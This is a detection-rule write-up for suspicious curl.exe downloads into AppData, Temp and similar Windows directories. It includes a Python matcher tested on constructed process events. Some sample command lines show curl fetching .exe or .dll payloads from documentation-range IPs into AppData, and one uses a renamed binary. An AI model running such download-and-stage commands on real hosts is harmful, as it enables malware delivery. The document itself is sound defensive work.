
Summary
This detection rule identifies suspicious executions of curl.exe on Windows endpoints, specifically launches in which curl is used to download a file into a user-writable or otherwise commonly abused directory. The logic runs on process-creation telemetry and evaluates the properties of the process launch, chiefly the image name and the command line. It first checks that the started process is curl.exe and then checks whether the command line contains an output location typically used by malware, such as %AppData%, %Temp% or similar paths, with particular weight given to target files whose extensions indicate executable content (e.g., .exe, .dll). Filtering is applied to reduce false positives by excluding known legitimate uses, such as the curl binary bundled with Git installations. In practice a match points to a payload being staged on the host (ingress tool transfer, T1105), often the retrieval of a second-stage component from attacker infrastructure, which makes the rule useful to threat hunters and incident responders. Because it keys on the command line alone, it only observes that a download to such a location was attempted, not that it succeeded, and downloads written elsewhere or under a different extension fall outside its scope.
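The detection logic described above, reduced to a small matcher and run over a handful of constructed process-creation events. This is an added illustration, not the rule's own definition or the rule engine's code; the field names (Image, OriginalFileName, CommandLine), the list of suspicious directories, the extensions .exe and .dll, the parsing of the -o/--output argument and the "binary lives under a \Git\ directory" allowlist are assumptions chosen for the example.

```python
import re

# Directory fragments the example treats as suspicious download targets.
# Assumed for this example; the real rule may use a different list.
SUSPICIOUS_DIRS = ("%appdata%", "%temp%", "%tmp%", "%public%",
                   "\\appdata\\", "\\temp\\", "\\users\\public\\")

# Target extensions the example flags (assumed for this example).
SUSPICIOUS_EXTS = (".exe", ".dll")

# curl writes to a named file via "-o <file>" or "--output <file>"; the flag is
# case-sensitive, since "-O" (remote name) takes no argument.
OUTPUT_FLAG = re.compile(r'(?:^|\s)(?:-o|--output)(?:\s+|=)("[^"]+"|\S+)')

# Constructed sample events in a Sysmon-like shape; none of this is real telemetry.
EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe http://203.0.113.10/payload.exe -o %AppData%\update.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s https://example.com/api/status"},
    {"Image": r"C:\Program Files\Git\mingw64\bin\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\alice\AppData\Local\Temp\git-lfs.dll https://example.com/git-lfs.dll"},
    {"Image": r"C:\Users\bob\cu.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"cu.exe --output C:\Users\bob\AppData\Roaming\svc.dll http://198.51.100.7/x"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\bob\Desktop\notes.txt https://example.com/notes.txt"},
]


def is_curl(event):
    """True if the launched binary is curl, by image path or by the PE's original file name
    (the latter catches a renamed copy, as in EVENTS[3])."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\curl.exe") or original == "curl.exe"


def output_path(cmdline):
    """Return the file named by -o/--output, or None if curl was not told to write a file."""
    m = OUTPUT_FLAG.search(cmdline)
    return m.group(1).strip('"') if m else None


def is_git_bundled(event):
    """Assumed allowlist: curl shipped inside a Git for Windows installation directory."""
    return "\\git\\" in event.get("Image", "").lower()


def matches(event):
    """Apply the rule: curl, not the Git-bundled copy, writing an .exe/.dll into a suspicious directory."""
    if not is_curl(event) or is_git_bundled(event):
        return False
    target = output_path(event.get("CommandLine", ""))
    if target is None:
        return False
    target = target.lower()
    return any(d in target for d in SUSPICIOUS_DIRS) and target.endswith(SUSPICIOUS_EXTS)


def alerts(events):
    """Indexes of the events that trigger the rule."""
    return [i for i, e in enumerate(events) if matches(e)]


if __name__ == "__main__":
    for i in alerts(EVENTS):
        print(f"ALERT event {i}: {EVENTS[i]['CommandLine']}")
```

Events 0 and 3 alert; event 1 has no output file, event 2 is excluded by the Git allowlist, and event 4 writes a .txt to the Desktop, which neither the directory list nor the extension list covers. The renamed binary in event 3 is caught only because the example also checks OriginalFileName, which is a useful addition when the telemetry source provides it.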
Categories
- Endpoint
- Windows
Data Sources
- Process
ATT&CK Techniques
- T1105
Created: 2020-07-03